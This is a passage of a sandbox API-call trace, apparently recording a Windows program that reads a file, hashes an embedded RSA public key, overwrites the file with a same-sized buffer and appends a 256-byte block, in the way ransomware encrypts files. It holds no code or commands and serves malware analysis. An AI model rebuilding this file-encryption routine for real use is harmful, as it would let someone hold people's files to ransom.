dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.049] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.049] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xaa39, lpOverlapped=0x0) returned 1 [0192.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.054] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.056] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.056] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.056] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.056] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.056] GetLastError () returned 0x0 [0192.056] SetLastError (dwErrCode=0x0) [0192.056] GetLastError () returned 0x0 [0192.056] SetLastError (dwErrCode=0x0) [0192.056] GetLastError () returned 0x0 [0192.056] SetLastError (dwErrCode=0x0) [0192.056] GetLastError () returned 0x0 [0192.056] SetLastError (dwErrCode=0x0) [0192.056] GetLastError () returned 0x0 [0192.056] SetLastError (dwErrCode=0x0) [0192.056] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.057] GetLastError () returned 0x0 [0192.057] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.058] GetLastError () returned 0x0 [0192.058] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] GetLastError () returned 0x0 [0192.059] SetLastError (dwErrCode=0x0) [0192.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.060] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.060] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.060] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.060] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.061] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaa40) returned 0x2e96a68 [0192.061] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d50 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93498 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d08 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.062] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2ea14b0 [0192.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea16d0 [0192.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea16d0 | out: hHeap=0x620000) returned 1 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934c8 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93570 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0192.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea14b0 | out: hHeap=0x620000) returned 1 [0192.064] GetCurrentThreadId () returned 0x66c [0192.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64df00 [0192.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.065] GetCurrentThreadId () returned 0x66c [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934c8 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93540 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93558 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934f8 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93570 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea14b0 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea16c0 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2e914a8 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea18d8 [0192.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea16c0 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea18d8 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0192.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0192.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d08 | out: hHeap=0x620000) returned 1 [0192.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea14b0 | out: hHeap=0x620000) returned 1 [0192.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0192.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.075] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0xaa34, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0xaa34, lpOverlapped=0x0) returned 1 [0192.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.076] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xaa39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.076] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.078] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, 